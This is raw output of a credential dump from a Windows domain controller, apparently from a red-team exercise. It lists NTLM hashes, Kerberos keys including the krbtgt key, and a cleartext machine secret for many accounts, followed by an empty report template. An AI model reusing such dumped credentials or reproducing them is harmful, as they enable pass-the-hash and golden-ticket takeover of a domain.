Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a0c2d70beeb961c56ecee00afbc660bd:::
tina.bell:1110:aad3b435b51404eeaad3b435b51404ee:4f4fcd1696d00353d227adb600cb31f0:::
jennifer.smith:1111:aad3b435b51404eeaad3b435b51404ee:8d71d1474c84efde1360d9d912563a1b:::
rebecca.contreras:1112:aad3b435b51404eeaad3b435b51404ee:8cc94bfff77c598188d5f0b96fdb8832:::
samantha.little:1113:aad3b435b51404eeaad3b435b51404ee:2f38daebf6a54ef98b61939d62a930d0:::
timothy.williams:1114:aad3b435b51404eeaad3b435b51404ee:654f046355f27fbe651e4587ad61427a:::
amanda.garcia:1115:aad3b435b51404eeaad3b435b51404ee:af59cd6f4a6116d17bb4d4e11df81a4d:::
michelle.allen:1116:aad3b435b51404eeaad3b435b51404ee:808ac06bfd578e4224389999a7d78ba5:::
gary.wallace:1117:aad3b435b51404eeaad3b435b51404ee:b16da5dfa1d4728206d11df97b151942:::
natasha.davis:1118:aad3b435b51404eeaad3b435b51404ee:e1876e00d9ccec5acc822b5bb04e01e9:::
jerome.mason:1119:aad3b435b51404eeaad3b435b51404ee:9cf5138794a7c041f1ecadb054b9d545:::
mark.miller:1120:aad3b435b51404eeaad3b435b51404ee:d38941df528576ca534003d034615aca:::
charles.combs:1121:aad3b435b51404eeaad3b435b51404ee:198101b27a24152164fe997b336787fe:::
lisa.petersen:1122:aad3b435b51404eeaad3b435b51404ee:7ff65da6324122e3311ee840892695f7:::
laura.lewis:1123:aad3b435b51404eeaad3b435b51404ee:c4cd60d0dde4a027e037eea626c4f839:::
barry.hill:1124:aad3b435b51404eeaad3b435b51404ee:99c61063f338f1dea5278c475099b91e:::
AD$:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NEWS$:1125:aad3b435b51404eeaad3b435b51404ee:af6124af74c667a9d8ab78044cfee3c3:::
JD$:1126:aad3b435b51404eeaad3b435b51404ee:008233fe7393f9f78c72ce4b2c5af40b:::
LTV$:1127:aad3b435b51404eeaad3b435b51404ee:2b8f47f43823f9eefa0c5480a40727e0:::
WSTN$:1128:aad3b435b51404eeaad3b435b51404ee:ccc8b460de5c2c917e3a401b2c15d873:::
WWW$:1129:aad3b435b51404eeaad3b435b51404ee:8f049fc814f593d8e01e7a74958a8e4a:::
[*] Kerberos keys grabbed
Scoundrel\Scoundrel:aes256-cts-hmac-sha1-96:6ae121653037dff0c4abc3654f3c8b73d0b39fe0068ca7dcdcb49f9ba3822649
Scoundrel\Scoundrel:aes128-cts-hmac-sha1-96:ae0ebb164104dbbbdb8b3578b9577f59
Scoundrel\Scoundrel:des-cbc-md5:7662bcfbe02a1538
krbtgt:aes256-cts-hmac-sha1-96:3ccb2251c96945d002f3b42ca87f248ffe6647b6fd8f81bb818db0ac71ad2a57
krbtgt:aes128-cts-hmac-sha1-96:9236d0d1e1a9bdf465d6a73d70139eed
krbtgt:des-cbc-md5:57fdd5978f893b94
tina.bell:aes256-cts-hmac-sha1-96:f02b85a0282299cbc9b8f864ca4c3aa17ee79a04cba3dffa7d85acf76b51f7de
tina.bell:aes128-cts-hmac-sha1-96:88fd7f8021a8e9a6988a5dc5ebe0d661
tina.bell:des-cbc-md5:a889f82c574f237f
jennifer.smith:aes256-cts-hmac-sha1-96:6a578bfca3a3291da89bec81c878490061a8a1ed09da72d5134aabd21b137ce8
jennifer.smith:aes128-cts-hmac-sha1-96:ab5ff50ffe62b5dfd99c63be435a3de9
jennifer.smith:des-cbc-md5:32a8b6eac7cb20f8
rebecca.contreras:aes256-cts-hmac-sha1-96:e6883ed457a64e158d001ef995d7db0fa1e41f5c6d0b3a4a55e67e98b0d7ff45
rebecca.contreras:aes128-cts-hmac-sha1-96:7082de72dc2279f36e882dfea62c9205
rebecca.contreras:des-cbc-md5:3d4cba465da48a80
samantha.little:aes256-cts-hmac-sha1-96:6d9e5c0a3c68f99e9a19ddc3ace808c4e94355e2418c61d495d36d7e5a203dcb
samantha.little:aes128-cts-hmac-sha1-96:e8677bfbcd2a26570eb56ee234181334
samantha.little:des-cbc-md5:5bd6dc49e0fe9e8c
timothy.williams:aes256-cts-hmac-sha1-96:585bd6f8eeb4965f4a11236b0c8005be5fc5f16de358adfaaf7167b2e269169d
timothy.williams:aes128-cts-hmac-sha1-96:16c0ec230548a9cedf0068d02f6545e4
timothy.williams:des-cbc-md5:3449dc6792abbc7f
amanda.garcia:aes256-cts-hmac-sha1-96:97558e97a793793928de97cf4df520bbb025b48e164c4a7fba7c42097b29379d
amanda.garcia:aes128-cts-hmac-sha1-96:1d2b8bfee8014cdb5a8a37f3d3154ffb
amanda.garcia:des-cbc-md5:8a0897ba4345fba2
michelle.allen:aes256-cts-hmac-sha1-96:f7fca98cb8fcecd3305f19f91fbfc878393c08dea75e9fec77071ed84757f127
michelle.allen:aes128-cts-hmac-sha1-96:dad064e3214f3bb8cc3e0e29054dda93
michelle.allen:des-cbc-md5:e9d55279512c756d
gary.wallace:aes256-cts-hmac-sha1-96:1c2d12a76d0b944ac31ce823e0682f8936586fb8e7e544aeb87076720931fbbe
gary.wallace:aes128-cts-hmac-sha1-96:8063dcaaf519c0f8c9425e2ff1efe933
gary.wallace:des-cbc-md5:022a1507ef26d57a
natasha.davis:aes256-cts-hmac-sha1-96:fe894a90b9eafe6906871ffb4d3a1ab3b7c97be4cb597e4901aab224ac96ca31
natasha.davis:aes128-cts-hmac-sha1-96:c6c2365fc078e4ffee6a55ca4c49f571
natasha.davis:des-cbc-md5:c76838c4311c70cd
jerome.mason:aes256-cts-hmac-sha1-96:13ac3514fe31d05a6534a87b06863bf314d0089597618d7976fc21209e7d4853
jerome.mason:aes128-cts-hmac-sha1-96:cc3c8965816faff023ec93201c7280be
jerome.mason:des-cbc-md5:348502797cd6e940
mark.miller:aes256-cts-hmac-sha1-96:f2d311460681eec387b7424fd7f78e51628c83039867d266a436ffb1ee8526c7
mark.miller:aes128-cts-hmac-sha1-96:795347c04c13cc3e05432fda784bcb3a
mark.miller:des-cbc-md5:891a46ba8fc43de9
charles.combs:aes256-cts-hmac-sha1-96:5f777e832ed7fb60749e9928d075a036325cc0fd911a9129d9d3c9bc56dca23e
charles.combs:aes128-cts-hmac-sha1-96:8ad9309982d0caa0c6fd9b83e43de705
charles.combs:des-cbc-md5:91759d5beae361e6
lisa.petersen:aes256-cts-hmac-sha1-96:1041c44eeee65d6e270bac180036ea4bd3427dea09694e216ab3b7b34172dec8
lisa.petersen:aes128-cts-hmac-sha1-96:ef0dcc5a078ace6008f9ed91215654d4
lisa.petersen:des-cbc-md5:83ada4257637d068
laura.lewis:aes256-cts-hmac-sha1-96:c900d99976748da38312701604c6ef28173dd5d7f60718cd3c324622cd631fd2
laura.lewis:aes128-cts-hmac-sha1-96:e058e44c12a0afde5451438c30741931
laura.lewis:des-cbc-md5:aea4ab89c837f46e
barry.hill:aes256-cts-hmac-sha1-96:b27349c20b01afb945b599d408fb2f22d2c58d57fd8879bcbdde00e21a995733
barry.hill:aes128-cts-hmac-sha1-96:9ebbd2638349085b591d81b7542245e6
barry.hill:des-cbc-md5:572c43a8a2108592
AD$:aes256-cts-hmac-sha1-96:835ed1468656acbba372e6f5aa91cd21f8cb62cabe8844e5b93164274b33ffc1
AD$:aes128-cts-hmac-sha1-96:0ae3de1d9f8b11e0e791f1fada8edc80
AD$:des-cbc-md5:f81aea372c6bea70
NEWS$:aes256-cts-hmac-sha1-96:970fd188e0f9dcb6a4b733c0274912522b4ccf692c34a71103ad6c8081a80c4e
NEWS$:aes128-cts-hmac-sha1-96:bf496310beebfcd712271700706a8080
NEWS$:des-cbc-md5:6870bac491da8904
JD$:aes256-cts-hmac-sha1-96:7d6f7ede6379439acab0cd6e1725786e4d9110d7a69b41809731cd3f36b79b55
JD$:aes128-cts-hmac-sha1-96:6421c1e9a6ce173129479f5bc09f4df1
JD$:des-cbc-md5:e0543408dad56e7f
LTV$:aes256-cts-hmac-sha1-96:b779009abbbaabc12dc947718d3c5e58260e4965df98e1d2120403759fb87769
LTV$:aes128-cts-hmac-sha1-96:a795e789c067266b12e224803aeb03c5
LTV$:des-cbc-md5:371f3ed6078c80a4
WSTN$:aes256-cts-hmac-sha1-96:ef51ac3bdd3c80680bc2cb8f112c996bb682b16c458b0896a1654462deb9c466
WSTN$:aes128-cts-hmac-sha1-96:bd79bf6f1d4928373e7cd30badbe62b8
WSTN$:des-cbc-md5:8fc86813a8d3e0e0
WWW$:aes256-cts-hmac-sha1-96:a9ca5490356ddd4facfe3ca6973ace257fe7cd2b9505f36816e6494da34309bb
WWW$:aes128-cts-hmac-sha1-96:1ea368b4e345bf4349d23397f530e7f6
WWW$:des-cbc-md5:7fd373b668f29b70
[*] ClearText passwords grabbed
krbtgt:CLEARTEXT:0xc60a96eceb0c00d099c270755c803dfd53a7875a7fead349f1460bb3f6fa418ffd5b0a107a1c227c87c4962a4254052a45e926d83cadc45372a040e792ad4db206c3ac613d68c8fc257a27828a73335ead0e5937cacaccc7b54e45e487f8a8418a8f2264382bbc63ed3a52877b7d0f82e32626bc60c7f6538604a8be9e07ef23c571da410dc050bb9d3759bbda12b3ece15e28043d56fdfcd8cd14c1bd67e33a79042f1c13aca3d2dbdffc6e627d477a31cb24cb47c14792d7094f1181df0e478722b8a390d451fc591a4e9d644fa5fccf12b53c0c1302e662cd5eccc0e1adef116aa81c3d446c20675b3a5ca3302b1b626923eedbda2c22e2d29a9850eb958522f597ccc2b6abc12586eb3c358196e8f8e60a1c8768214b17aed7cca3275ec6f792ccdea811609916159bce8621285d681b65fca708781da6b09e2cd7885d5c98891ad5e031fd6a2a16787d2942d2793aea1e19574f1b6bdc0dbde1cd602eab466479f7d8238652746de964be82ff9fcd5601d135030e4ff04eb37ce807da801f8c4f9552c21f3522300982f3e274e619f7f1682b7aa198d54144fd2ee3d3b7fa0ffdd560c4e13330487c0678e254f761af81bc47a55647b049564a8d67bf182753e0fd25c2246c74400fbd01ea7af4f6e473973f479d22e0db5196f62ae22aa010b1dff866a6831142c5b6dd432ac23256f19cd9bd448b74b0d6b36b2bd9f8
[*] Cleaning up...


Notable Defenses
Add content here...
Team Spirit Issues
Add content here...